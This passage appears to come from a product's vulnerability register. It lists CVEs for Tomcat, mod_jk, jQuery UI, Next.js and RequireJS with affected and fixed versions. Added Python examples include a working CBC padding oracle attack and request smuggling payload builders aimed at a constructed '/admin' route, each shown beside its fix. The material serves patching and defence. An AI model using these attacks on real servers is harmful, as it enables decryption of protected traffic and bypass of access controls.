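    requires_cert = VHOSTS.get(target)
    if requires_cert is None:
        return False, "unknown virtual host"
    if requires_cert and not client_cert_presented:
        return False, "client certificate required"
    return True, "served by " + target


if __name__ == "__main__":
    # Bypass: handshake against public.example.com (no cert), request addressed to admin.
    print(vulnerable_dispatch("public.example.com", "admin.example.com", False))
    print(fixed_dispatch("public.example.com", "admin.example.com", False))
    # A case-only difference must neither bypass nor spuriously fail the strict check.
    print(fixed_dispatch("Admin.Example.COM", "admin.example.com:8443", True))
```

The check belongs at the connector only when client-certificate authentication is enforced there; as the entry above notes, enforcement inside the web application is not affected, because the application sees the certificate (or its absence) regardless of which TLS configuration served the handshake.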

2026-03-20

Important

CVE-2026-29146

EncryptInterceptor vulnerable to padding oracle attack by default
The EncryptInterceptor used CBC mode by default, which is vulnerable to a padding oracle attack.

This was fixed with commit 0112ed22.

This issue was reported to the Tomcat security team on 22 February 2026. The issue was made public on 9 April 2026.

Affects: 9.0.13 to 9.0.115

under investigation
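Why CBC combined with any signal of padding validity is dangerous, as an added example that is not Tomcat's code: a padding oracle attack that recovers a ciphertext's plaintext one byte at a time using nothing but valid/invalid answers. A toy SHA-256-based Feistel cipher stands in for the block cipher (an assumption made so the block runs with the standard library; the attack does not depend on which cipher CBC wraps), and the key, IV and message are constructed. An authenticated mode such as AES-GCM rejects a modified ciphertext before any padding is examined, which is what removes the oracle.

```python
import hashlib

# Added example, not Tomcat's code: a padding oracle attack on CBC. A toy 16-byte
# Feistel cipher built from SHA-256 stands in for the real block cipher (assumption:
# the attack does not depend on which block cipher CBC wraps). The "oracle" is any
# signal that tells the sender whether padding was valid: a distinct error, log
# line or timing difference.

BLOCK = 16


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, i, half):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")          # the observable that becomes the oracle
    return data[:-n]


def cbc_encrypt(key, iv, msg):
    n = BLOCK - len(msg) % BLOCK
    pt, out, prev = msg + bytes([n]) * n, b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ct):
    if not ct or len(ct) % BLOCK:
        raise ValueError("bad length")
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return pkcs7_unpad(out)


def make_padding_oracle(key):
    """The attacker never sees the key; it only learns valid/invalid padding per query."""
    def oracle(iv, ct):
        try:
            cbc_decrypt(key, iv, ct)
            return True
        except ValueError:
            return False
    return oracle


def recover_block(oracle, prev, target):
    """Recover one plaintext block from (prev, target) with at most 16*256 oracle queries."""
    inter = bytearray(BLOCK)                       # block_decrypt(target), learned last byte first
    for p in range(BLOCK - 1, -1, -1):
        pad = BLOCK - p
        for guess in range(256):
            forged = bytearray(BLOCK)
            for j in range(p + 1, BLOCK):
                forged[j] = inter[j] ^ pad         # later bytes decrypt to the pad value
            forged[p] = guess
            if not oracle(bytes(forged), target):
                continue
            if p == BLOCK - 1:
                # Edge case: the hit may be a longer padding such as 0x02 0x02, not 0x01.
                # Disturbing byte 14 breaks the former and leaves the latter valid.
                forged[p - 1] ^= 0xFF
                if not oracle(bytes(forged), target):
                    continue
            inter[p] = guess ^ pad
            break
        else:
            raise RuntimeError("no valid guess: the oracle is not behaving as modelled")
    return _xor(bytes(inter), prev)


def padding_oracle_attack(oracle, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    pt = b"".join(recover_block(oracle, blocks[i - 1], blocks[i]) for i in range(1, len(blocks)))
    return pkcs7_unpad(pt)


# Constructed inputs: the attacker is given IV and ciphertext only.
KEY = hashlib.sha256(b"cluster-shared-secret").digest()[:16]
IV = bytes(range(BLOCK))
MESSAGE = b"session=3f9a; role=cluster-node"

if __name__ == "__main__":
    print(padding_oracle_attack(make_padding_oracle(KEY), IV, cbc_encrypt(KEY, IV, MESSAGE)))
```

The cost is at most 16 x 256 queries per block and the attack needs no knowledge of the key, which is why an interceptor that answers "bad padding" differently from "bad MAC" (or answers faster) hands the cluster traffic to anyone on the network path.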

2026-03-20

Moderate

CVE-2026-29145

OCSP checks sometimes soft-fail even when soft-fail is disabled
CLIENT_CERT authentication did not fail OCSP checks as expected for some scenarios when soft fail was disabled.

This was fixed with commit d1406df5.

This issue was reported to the Tomcat security team on 26 February 2026. The issue was made public on 9 April 2026.

under investigation

2026-03-20

low

CVE-2026-29129

Configured TLS cipher preference order not preserved
The addition of the ability to configure TLS 1.3 cipher suites did not preserve the order of the configured cipher suites and ciphers.

This was fixed with commit 6db23856.

This was reported as a bug on 20 February 2026 and the security implications were identified by the Tomcat security team the same day. The issue was made public on 9 April 2026.

Affects: 9.0.114 to 9.0.115

under investigation

2026-03-20

low

CVE-2026-25854

Occasionally open redirect
When a Tomcat node in a cluster with the LoadBalancerDrainingValve was in the disabled (draining) state, a specially crafted URL could be used to trigger a redirect to a URI of the attacker's choice.

This was fixed with commit c5a45ae6.

This issue was reported to the Tomcat security team on 30 January 2026. The issue was made public on 9 April 2026.

Affects: 9.0.0.M23 to 9.0.115

under investigation

2026-03-20

low

CVE-2026-24880

Request smuggling via invalid chunk extension
Tomcat did not validate the contents of HTTP/1.1 chunk extensions. This enabled a request smuggling attack if a reverse proxy in front of Tomcat allowed CRLF sequences in an otherwise valid chunk extension.

This was fixed with commits 1b586d6a and 6d478dbe.

This issue was reported to the Tomcat security team on 19 January 2026. The issue was made public on 9 April 2026.

Affects: 9.0.0.M1 to 9.0.115

under investigation
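A chunked-body reader with and without strict validation of chunk extensions, as an added example that is not Tomcat's code, together with a constructed payload that desyncs a permissive front end from a back end that ends the chunk-size line at the first CRLF. The front-end model (a double-quoted extension value may run across CRLF) is an assumption about what "allowed CRLF sequences in an otherwise valid chunk extension" can look like, not a description of any particular proxy; the strict reader applies the RFC 9112 chunk-ext grammar and refuses the payload instead of guessing a boundary. The smuggled request and host names are constructed.

```python
import re

# Added example, not Tomcat's code: a chunked-body reader with and without strict
# validation of HTTP/1.1 chunk extensions, plus a constructed payload showing how a
# front end that tolerates CRLF inside a quoted chunk-ext value desyncs from a back
# end that ends the chunk-size line at the first CRLF.

TCHAR = rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]"
# one chunk-ext parameter: BWS ";" BWS token [ BWS "=" BWS ( token / quoted-string ) ]
EXT_PARAM = re.compile(
    rb"[ \t]*;[ \t]*(" + TCHAR + rb"+)"
    rb"(?:[ \t]*=[ \t]*(?:" + TCHAR + rb"+"
    rb'|"(?:[\t !#-\[\]-~\x80-\xff]|\\[\t -~\x80-\xff])*"))?'
)


def validate_chunk_ext(ext):
    """Strict RFC 9112 chunk-ext grammar. Returns the extension names, raises on junk."""
    names, pos = [], 0
    while pos < len(ext):
        m = EXT_PARAM.match(ext, pos)
        if not m:
            raise ValueError("malformed chunk extension at %r" % ext[pos:pos + 16])
        names.append(m.group(1))
        pos = m.end()
    return names


def _chunk_line_end(stream, pos, crlf_in_quotes):
    """Index of the CR that ends the chunk-size line. The conforming reader stops at the
    first CRLF; the lenient variant (our model of a permissive proxy, an assumption)
    lets a double-quoted extension value run across CRLF."""
    if not crlf_in_quotes:
        end = stream.find(b"\r\n", pos)
    else:
        end, in_quotes, i = -1, False, pos
        while i < len(stream) - 1:
            c = stream[i:i + 1]
            if c == b'"':
                in_quotes = not in_quotes
            elif c == b"\\" and in_quotes:
                i += 1                                  # skip the escaped octet
            elif not in_quotes and stream[i:i + 2] == b"\r\n":
                end = i
                break
            i += 1
    if end == -1:
        raise ValueError("chunk-size line not terminated")
    return end


def read_chunked(stream, strict_ext, crlf_in_quotes=False):
    """Decode one chunked message body (no trailer fields). Returns (body, consumed)."""
    body, pos = b"", 0
    while True:
        end = _chunk_line_end(stream, pos, crlf_in_quotes)
        line, pos = stream[pos:end], end + 2
        size_hex, sep, ext = line.partition(b";")
        size_hex = size_hex.strip(b" \t")
        if not re.fullmatch(rb"[0-9A-Fa-f]{1,8}", size_hex):
            raise ValueError("bad chunk size %r" % size_hex)
        if strict_ext:
            validate_chunk_ext(sep + ext)
        size = int(size_hex, 16)
        if size == 0:
            if stream[pos:pos + 2] != b"\r\n":
                raise ValueError("missing CRLF after last chunk")
            return body, pos + 2
        chunk = stream[pos:pos + size]
        if len(chunk) < size or stream[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data truncated or not CRLF-terminated")
        body, pos = body + chunk, pos + size + 2


# Constructed second request that the attacker wants the back end to see on its own.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: backend.internal\r\n\r\n"


def build_payload():
    """Chunked body whose first chunk-size line carries a quoted extension value that
    spans a CRLF. The proxy treats everything up to the closing quote as one line; the
    back end ends the line at the embedded CRLF and takes different bytes as data."""
    size = len(SMUGGLED) + 7                    # 7 = len(b"\r\n0\r\n\r\n")
    filler = b"A" * (len(SMUGGLED) + 4)         # sized so both readers take exactly `size` data bytes
    return (b"%x;x=\"a\r\n" % size + filler + b'"\r\n'
            + b"\r\n0\r\n\r\n" + SMUGGLED        # chunk data as the proxy sees it
            + b"\r\n0\r\n\r\n")                  # terminator as the proxy sees it


def demo():
    payload = build_payload()
    _, proxy_used = read_chunked(payload, strict_ext=False, crlf_in_quotes=True)
    _, backend_used = read_chunked(payload, strict_ext=False)
    try:
        read_chunked(payload, strict_ext=True)
        rejected = False
    except ValueError:
        rejected = True
    return {"proxy_sees_one_request": proxy_used == len(payload),
            "backend_leftover_starts_with_smuggled": payload[backend_used:].startswith(SMUGGLED),
            "strict_backend_rejects": rejected}
```

The permissive front end consumes the whole payload as one request, the lenient back end stops early and reads the smuggled `GET /admin` as a fresh request on the same connection, and the strict back end raises on the unterminated quoted string in the extension and can close the connection; rejecting is the only safe answer, because there is no reading of the malformed line that both ends are guaranteed to share.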

Apache Tomcat JK Connector

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

2023-09-13

important

CVE-2023-41081

Information disclosure
In some circumstances, such as when a configuration included JkOptions +ForwardDirectories but the configuration did not provide explicit mounts for all possible proxied requests, mod_jk would use an implicit mapping and map the request to the first defined worker. Such an implicit mapping could result in the unintended exposure of the status worker and/or bypass security constraints configured in httpd. As of JK 1.2.49, the implicit mapping functionality has been removed and all mappings must now be via explicit configuration. Only mod_jk is affected by this issue. The ISAPI redirector is not affected.

up to version 4.0.1

4.1.0

2024-09-23

moderate

CVE-2024-46544

Incorrect default permissions for the memory mapped file configured by the JkShmFile directive on Unix like systems allows local users to view and/or modify the contents of the shared memory containing mod_jk configuration and status information. This could result in information disclosure and/or denial of service.

This was fixed with commit d55706e9.

This issue was identified by the Tomcat Security Team on 6 August 2024. The issue was made public on 23 September 2024.

up to version 4.1.1

low risk: the attack vector is local only

4.2.0

Jquery

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

Version 3.7.1 - no known vulnerabilities

JqueryUI

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

2022-07-20

CVE-2022-31160

jQuery UI is a curated set of user interface interactions, effects, widgets, and themes built on top of jQuery. Versions prior to 1.13.2 are potentially vulnerable to cross-site scripting. Initializing a checkboxradio widget on an input enclosed within a label causes that parent label's contents to be treated as the input's label. Calling `.checkboxradio( "refresh" )` on such a widget when the initial HTML contained encoded HTML entities will make them erroneously get decoded. This can lead to potentially executing JavaScript code. The bug has been patched in jQuery UI 1.13.2.

up to version 4.0.1

4.1.0

next.js

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

2024-05-09

High 7.5

CVE-2024-34351

Next.js is a React framework that can provide building blocks to create web applications. A Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions. If the `Host` header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself. The required conditions are 1) Next.js is running in a self-hosted manner; 2) the Next.js application makes use of Server Actions; and 3) the Server Action performs a redirect to a relative path which starts with a `/`. This vulnerability was fixed in Next.js `14.1.1`.

not affected

2024-05-09

High 7.5

CVE-2024-34350

Next.js is a React framework that can provide building blocks to create web applications. Prior to 13.5.1, an inconsistent interpretation of a crafted HTTP request meant that requests are treated as both a single request, and two separate requests by Next.js, leading to desynchronized responses. This led to a response queue poisoning vulnerability in the affected Next.js versions. For a request to be exploitable, the affected route also had to be making use of the [rewrites](https://nextjs.org/docs/app/api-reference/next-config-js/rewrites ) feature in Next.js. The vulnerability is resolved in Next.js `13.5.1` and newer.

not affected

2024-07-10

High 7.5

CVE-2024-39693

Next.js is a React framework. A Denial of Service (DoS) condition was identified in Next.js. Exploitation of the bug can trigger a crash, affecting the availability of the server. This vulnerability was resolved in Next.js 13.5 and later.

not affected

2024-09-17

High 7.5

CVE-2024-46982

Next.js is a React framework for building full-stack web applications. By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using pages router, & 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.

not affected

2024-10-14

High 7.5

CVE-2024-47831

Next.js is a React Framework for the Web. Versions on the 10.x, 11.x, 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in the image optimization feature which allows for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption. Neither a `next.config.js` configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value, nor a Next.js application hosted on Vercel, is affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.

not affected

2024-12-17

High 7.5

CVE-2024-51479

Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application's root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability.

not affected

2025-01-03

Medium 5.3

CVE-2024-56332

Next.js is a React framework for building full-stack web applications. Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution. This vulnerability can also be used as a Denial of Wallet (DoW) attack when deployed in providers billing by response times. (Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time.). Deployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing. This is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations to those then this vulnerability is novel. This vulnerability affects only Next.js deployments using Server Actions. The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that users upgrade to a safe version. There are no official workarounds.

not affected

2025-04-02

Low 1.7

CVE-2025-30218

Next.js is a React framework for building full-stack web applications. To mitigate CVE-2025-29927, Next.js validated the x-middleware-subrequest-id which persisted across multiple incoming requests. However, this subrequest ID is sent to all requests, even if the destination is not the same host as the Next.js application. Initiating a fetch request to a third-party within Middleware will send the x-middleware-subrequest-id to that third party. This vulnerability is fixed in 12.3.6, 13.5.10, 14.2.26, and 15.2.4.

not affected

2025-03-21

Critical 9.1

CVE-2025-29927

Next.js is a React framework for building full-stack web applications. Prior to 14.2.25 and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 14.2.25 and 15.2.3.

not affected

2025-05-14

Low 3.7

CVE-2025-32421

Next.js is a React framework for building full-stack web applications. Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML. This issue was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from incoming requests. Applications hosted on Vercel's platform are not affected by this issue, as the platform does not cache responses based solely on `200 OK` status without explicit `cache-control` headers. Those who self-host Next.js deployments and are unable to upgrade immediately can mitigate this vulnerability by stripping the `x-now-route-matches` header from all incoming requests at the content delivery network (CDN) and setting `cache-control: no-store` for all responses at risk. The maintainers of Next.js strongly recommend only caching responses with explicit cache-control headers.

not affected

2025-05-30

Low 2.3

CVE-2025-48068

Next.js is a React framework for building full-stack web applications. In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, Next.js may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while npm run dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.

not affected

2025-07-03

Low 3.7

CVE-2025-49005

Next.js is a React framework for building full-stack web applications. In Next.js App Router from 15.3.0 to before 15.3.3 and Vercel CLI from 41.4.1 to 42.2.0, a cache poisoning vulnerability was found. The issue allowed page requests for HTML content to return a React Server Component (RSC) payload instead under certain conditions. When deployed to Vercel, this would only impact the browser cache, and would not lead to the CDN being poisoned. When self-hosted and deployed externally, this could lead to cache poisoning if the CDN does not properly distinguish between RSC / HTML in the cache.

not affected

2025-07-03

High 7.5

CVE-2025-49826

Next.js is a React framework for building full-stack web applications. From versions 15.0.4-canary.51 to before 15.1.8, a cache poisoning bug leading to a Denial of Service (DoS) condition was found in Next.js. This issue does not impact customers hosted on Vercel. Under certain conditions, this issue may allow a HTTP 204 response to be cached for static pages, leading to the 204 response being served to all users attempting to access the page. This issue has been addressed in version 15.1.8.

not affected

2025-08-29

High 8.2

CVE-2025-57822

Next.js is a React framework for building full-stack web applications. Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly passing the request object, it could lead to SSRF in self-hosted applications that incorrectly forwarded user-supplied headers. This vulnerability has been fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function.

not affected

2025-08-29

Medium 4.3

CVE-2025-55173

Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization is vulnerable to content injection. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5.

not affected

2025-08-29

Medium 6.2

CVE-2025-57752

Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization API routes are affected by cache key confusion. When images returned from API routes vary based on request headers (such as Cookie or Authorization), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.

not affected

2025-12-03

High 10.0

CVE-2025-55182

A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.

not affected

2025-12-11

Medium 5.3

CVE-2025-55183

An information leak vulnerability exists in specific configurations of React Server Components versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. A specifically crafted HTTP request sent to a vulnerable Server Function may unsafely return the source code of any Server Function. Exploitation requires the existence of a Server Function which explicitly or implicitly exposes a stringified argument.

not affected

2025-12-11

High 7.5

CVE-2025-55184

A pre-authentication denial of service vulnerability exists in React Server Components versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints, which can cause an infinite loop that hangs the server process and may prevent future HTTP requests from being served.

not affected

2025-12-12

High 7.5

CVE-2025-67779

It was found that the fix addressing CVE-2025-55184 in React Server Components was incomplete and does not prevent a denial of service attack in a specific case. React Server Components versions 19.0.2, 19.1.3 and 19.2.2 are affected, allowing unsafe deserialization of payloads from HTTP requests to Server Function endpoints. This can cause an infinite loop that hangs the server process and may prevent future HTTP requests from being served.

not affected

2026-01-26

High 7.5

CVE-2025-59471

A denial of service vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.

not affected

2026-01-26

High 7.5

CVE-2025-59472

A denial of service vulnerability exists in Next.js versions with Partial Prerendering (PPR) enabled when running in minimal mode. The PPR resume endpoint accepts unauthenticated POST requests with the `Next-Resume: 1` header and processes attacker-controlled postponed state data. Two closely related vulnerabilities allow an attacker to crash the server process through memory exhaustion: 1. **Unbounded request body buffering**: The server buffers the entire POST request body into memory using `Buffer.concat()` without enforcing any size limit, allowing arbitrarily large payloads to exhaust available memory. 2. **Unbounded decompression (zipbomb)**: The resume data cache is decompressed using `inflateSync()` without limiting the decompressed output size. A small compressed payload can expand to hundreds of megabytes or gigabytes, causing memory exhaustion. Both attack vectors result in a fatal V8 out-of-memory error (`FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory`) causing the Node.js process to terminate. The zipbomb variant is particularly dangerous as it can bypass reverse proxy request size limits while still causing large memory allocation on the server. To be affected you must have an application running with `experimental.ppr: true` or `cacheComponents: true` configured along with the NEXT_PRIVATE_MINIMAL_MODE=1 environment variable.

not affected

2026-03-18

High 7.5

CVE-2026-27979

Next.js is a React framework for building full-stack web applications. Starting in version 16.0.1 and prior to version 16.1.7, a request containing the `next-resume: 1` header (corresponding with a PPR resume request) would buffer request bodies without consistently enforcing `maxPostponedStateSize` in certain setups. The previous mitigation protected minimal-mode deployments, but equivalent non-minimal deployments remained vulnerable to the same unbounded postponed resume-body buffering behavior. In applications using the App Router with Partial Prerendering capability enabled (via `experimental.ppr` or `cacheComponents`), an attacker could send oversized `next-resume` POST payloads that were buffered without consistent size enforcement in non-minimal deployments, causing excessive memory usage and potential denial of service. This is fixed in version 16.1.7 by enforcing size limits across all postponed-body buffering paths and erroring when limits are exceeded. If upgrading is not immediately possible, block requests containing the `next-resume` header, as this is never valid to be sent from an untrusted client.

under investigation

2026-03-18

Medium 5.4

CVE-2026-27977

Next.js is a React framework for building full-stack web applications. Starting in version 16.0.1 and prior to version 16.1.7, in `next dev`, cross-site protection for internal websocket endpoints could treat `Origin: null` as a bypass case even if `allowedDevOrigins` is configured, allowing privacy-sensitive/opaque contexts (for example sandboxed documents) to connect unexpectedly. If a dev server is reachable from attacker-controlled content, an attacker may be able to connect to the HMR websocket channel and interact with dev websocket traffic. This affects development mode only. Apps without a configured `allowedDevOrigins` still allow connections from any origin. The issue is fixed in version 16.1.7 by validating `Origin: null` through the same cross-site origin-allowance checks used for other origins. If upgrading is not immediately possible, do not expose `next dev` to untrusted networks and/or block websocket upgrades to `/_next/webpack-hmr` when `Origin` is `null` at the proxy.

under investigation

2026-03-18

Medium 5.3

CVE-2026-27978

Next.js is a React framework for building full-stack web applications. Starting in version 16.0.1 and prior to version 16.1.7, `origin: null` was treated as a "missing" origin during Server Action CSRF validation. As a result, requests from opaque contexts (such as sandboxed iframes) could bypass origin verification instead of being validated as cross-origin requests. An attacker could induce a victim browser to submit Server Actions from a sandboxed context, potentially executing state-changing actions with victim credentials (CSRF). This is fixed in version 16.1.7 by treating `'null'` as an explicit origin value and enforcing host/origin checks unless `'null'` is explicitly allowlisted in `experimental.serverActions.allowedOrigins`. If upgrading is not immediately possible, add CSRF tokens for sensitive Server Actions, prefer `SameSite=Strict` on sensitive auth cookies, and/or do not allow `'null'` in `serverActions.allowedOrigins` unless intentionally required and additionally protected.

under investigation

2026-03-18

High 7.5

CVE-2026-27980

Next.js is a React framework for building full-stack web applications. Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and exhaust disk space, causing denial of service. This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, including eviction of least-recently-used entries when the limit is exceeded. Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately possible, periodically clean `.next/cache/images` and/or reduce variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and `images.qualities`).

under investigation

2026-03-18

Medium 5.5

CVE-2026-29057

Next.js is a React framework for building full-stack web applications. Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS` request using `Transfer-Encoding: chunked` could trigger request boundary disagreement between the proxy and backend. This could allow request smuggling through rewritten routes. An attacker could smuggle a second request to unintended backend routes (for example, internal/admin endpoints), bypassing assumptions that only the configured rewrite destination/path is reachable. This does not impact applications hosted on providers that handle rewrites at the CDN level, such as Vercel. The vulnerability originated in an upstream library vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency’s behavior so `content-length: 0` is added only when both `content-length` and `transfer-encoding` are absent, and `transfer-encoding` is no longer removed in that code path. If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy, and/or enforce authentication/authorization on backend routes.

under investigation
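The header rule this entry describes, as an added example that is neither Next.js's nor the vendored proxy library's code: the pre-fix normalisation for DELETE/OPTIONS beside the fixed one, and a content-length framing model of the back end that shows why dropping `transfer-encoding` and adding `content-length: 0` turns the forwarded body into a second request. It assumes the proxy forwards the already de-chunked body bytes behind the rewritten headers; host names, paths and the smuggled request are constructed.

```python
# Added example, neither Next.js's nor the vendored proxy library's code: the header
# rule the advisory describes, modelled as a vulnerable and a fixed normaliser, plus a
# content-length-framing model of the back end. Assumption: the proxy forwards the
# already de-chunked body bytes behind the rewritten headers; "DELETE" and "OPTIONS"
# are the methods the advisory names.

BODILESS_BY_CONVENTION = ("DELETE", "OPTIONS")


def forward_headers_vulnerable(method, headers):
    """Pre-fix: for DELETE/OPTIONS, drop transfer-encoding and claim an empty body."""
    h = {k.lower(): v for k, v in headers.items()}
    if method in BODILESS_BY_CONVENTION:
        h.pop("transfer-encoding", None)       # body framing information discarded ...
        h["content-length"] = "0"              # ... and replaced by "there is no body"
    return h


def forward_headers_fixed(method, headers):
    """Post-fix: add content-length: 0 only when the client sent neither framing header,
    and never remove transfer-encoding."""
    h = {k.lower(): v for k, v in headers.items()}
    if "content-length" not in h and "transfer-encoding" not in h:
        h["content-length"] = "0"
    return h


def wire(method, path, headers, body):
    """Serialise what the proxy puts on the back-end connection."""
    head = "%s %s HTTP/1.1\r\n" % (method, path)
    head += "".join("%s: %s\r\n" % item for item in headers.items())
    return head.encode("latin-1") + b"\r\n" + body


def backend_request_lines(stream):
    """Model of a back end that frames message bodies by content-length; returns the
    request line of every request it believes it received."""
    lines, pos = [], 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:
            break
        head = stream[pos:end].decode("latin-1").split("\r\n")
        hdrs = {k.strip().lower(): v.strip()
                for k, v in (l.split(":", 1) for l in head[1:] if ":" in l)}
        if "content-length" not in hdrs:
            break                                  # chunked framing is outside this model
        lines.append(head[0])
        pos = end + 4 + int(hdrs["content-length"])
    return lines


# Constructed attacker request: a chunked DELETE whose de-chunked body is a full request.
CLIENT_HEADERS = {"Host": "app.example", "Transfer-Encoding": "chunked"}
SMUGGLED_BODY = b"GET /admin HTTP/1.1\r\nHost: backend.internal\r\nContent-Length: 0\r\n\r\n"


def demo_vulnerable():
    hdrs = forward_headers_vulnerable("DELETE", CLIENT_HEADERS)
    return backend_request_lines(wire("DELETE", "/api/items/7", hdrs, SMUGGLED_BODY))
```

With the pre-fix headers the back end frames the DELETE as bodiless and reads the forwarded body as a second, unproxied `GET /admin`; with the fixed headers the `transfer-encoding: chunked` the client sent survives and no `content-length: 0` is invented, so both sides frame the body the same way. The same rule is the check to apply to any rewrite or proxy layer you operate: never add a content-length the client did not send while a transfer-encoding is present.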

RequireJS

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

2024-07-01

Medium 6.5

CVE-2024-38998

requirejs v2.3.6 was discovered to contain a prototype pollution via the function config. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.

yes

4.1.1

Hammer.js

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

Version 2.0.8 - no known vulnerabilities
